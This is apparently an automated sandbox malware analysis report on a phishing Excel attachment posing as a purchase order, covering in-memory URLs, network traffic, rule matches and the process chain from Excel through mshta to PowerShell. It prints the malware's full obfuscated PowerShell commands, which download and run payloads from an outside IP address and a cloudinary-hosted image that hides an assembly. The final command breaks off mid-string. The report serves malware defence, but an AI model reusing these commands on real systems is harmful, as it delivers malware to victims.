        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
        Source: powershell.exe, 00000008.00000002.478285781.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.519092403.00000000029BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
        Source: powershell.exe, 00000008.00000002.484435782.0000000012401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C230000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.0000000002811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
        Source: powershell.exe, 00000008.00000002.478285781.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.540924490.0000000002201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.519092403.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.573394856.0000000002031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: powershell.exe, 00000008.00000002.484435782.0000000012401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000008.00000002.484435782.0000000012401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000008.00000002.484435782.0000000012401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: mshta.exe, 00000004.00000003.457492496.00000000002E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.457860931.00000000002E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458394277.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457247139.000000000369D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512248812.0000000000394000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511764708.0000000000394000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://curt.wiz.co/
        Source: mshta.exe, 00000010.00000002.512540585.0000000002795000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511567960.0000000002795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://curt.wiz.co/1.0
        Source: mshta.exe, 00000010.00000002.512248812.0000000000394000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511764708.0000000000394000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://curt.wiz.co/9
        Source: mshta.exe, 00000010.00000002.512540585.0000000002795000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511567960.0000000002795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://curt.wiz.co/E=AL.
        Source: mshta.exe, 00000010.00000002.512248812.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, NB PO-104105107108.xls, ~DFC80289B61A888CC7.TMP.0.drString found in binary or memory: https://curt.wiz.co/VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluf
        Source: powershell.exe, 00000008.00000002.484435782.0000000012401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 0000000E.00000002.540924490.0000000002401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.573394856.0000000002231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
        Source: powershell.exe, 00000019.00000002.573394856.0000000002231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg
        Source: powershell.exe, 0000000E.00000002.540924490.0000000002401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.573394856.0000000002231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgX
        Source: mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C230000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.0000000002811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
        Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
        Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
        Source: unknownHTTPS traffic detected: 170.82.173.30:443 -> 192.168.2.22:49163 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 170.82.173.30:443 -> 192.168.2.22:49165 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 170.82.174.30:443 -> 192.168.2.22:49171 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 170.82.174.30:443 -> 192.168.2.22:49172 version: TLS 1.2
        Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

        System Summary

        barindex
        Source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 2648, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: NB PO-104105107108.xlsOLE: Microsoft Excel 2007+
        Source: NB PO-104105107108.xlsOLE: Microsoft Excel 2007+
        Source: NB PO-104105107108.xlsOLE: Microsoft Excel 2007+
        Source: NB PO-104105107108.xlsOLE: Microsoft Excel 2007+
        Source: ~DFC80289B61A888CC7.TMP.0.drOLE: Microsoft Excel 2007+
        Source: ~DFC80289B61A888CC7.TMP.0.drOLE: Microsoft Excel 2007+
        Source: ~DFC80289B61A888CC7.TMP.0.drOLE: Microsoft Excel 2007+
        Source: ~DFC80289B61A888CC7.TMP.0.drOLE: Microsoft Excel 2007+
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatnicefeatureswithsupercodebnaturalthingsinlineforgiven[1].htaJump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAg